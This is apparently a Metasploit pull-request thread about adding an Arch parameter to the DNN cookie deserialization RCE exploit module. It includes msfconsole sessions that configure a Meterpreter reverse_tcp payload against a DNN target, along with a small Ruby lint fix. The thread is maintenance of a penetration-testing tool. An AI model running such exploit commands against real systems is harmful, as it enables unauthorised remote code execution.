Adding Arch parameter to dnn_cookie_deserialization_rce module

[Fufu-btw]

Hi,
Seems like for a recent update, the dnn_cookie_deserialization_rce metasploit's module needs Arch parameter to enable x64 payloads.

Test Env

┌──(fufu㉿salt)-[~]
└─$ msfconsole --version
Framework Version: 6.4.5-dev

Target : DNN v9.0.1

Verification

Before :

msf6 > use windows/http/dnn_cookie_deserialization_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOST 10.10.110.10
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set target 0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST tun0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 8080
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > run

[-] Exploit failed: windows/x64/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.

After the modification :

msf6 > use windows/http/dnn_cookie_deserialization_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOST 10.10.110.10
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set target 0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST tun0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 8080
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > run

[*] Trying to determine DNN Version...
[!] DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED
[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Sending Exploit Payload to: /__ ...
[*] Exploit completed, but no session was created.

[smcintyre-r7]

This is due to the changes I introduced in #19111. Prior to that, users were able to set payloads with whatever architecture they wanted and the framework would allow it regardless of what the module defined as compatible. There's probably other deserialization modules that are affected if the module didn't define that they were compatible with ARCH_X64.

[smcintyre-r7]

The linting is failing because of two other lines in the module.

If you make this change, it should fix it.

     if @encrypted
       # Requires either supplied key and IV, or verification code and plaintext
-      if (!key.blank? && !iv.blank?)
+      if !key.blank? && !iv.blank?
         @passphrase = key + iv
         # Key and IV were supplied, don't try and decrypt.
         @try_decrypt = false
-      elsif (!@verification_codes.empty? && !@kpt.blank?)
+      elsif !@verification_codes.empty? && !@kpt.blank?
         @try_decrypt = true
       else
         fail_with(Failure::BadConfig, 'You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).')

If you have rubocop setup already, you can make the changes automatically with rubocop -a modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb but if you don't it'd be easier to just do it by hand.

[adfoster-r7]

Somewhat related; we've got a set of checks that we can add the requirement of arch being provided:

Validation rules: https://github.com/rapid7/metasploit-framework/blob/master/spec/support/lib/module_validation.rb

Validation spec: https://github.com/rapid7/metasploit-framework/blob/master/spec/module_validation_spec.rb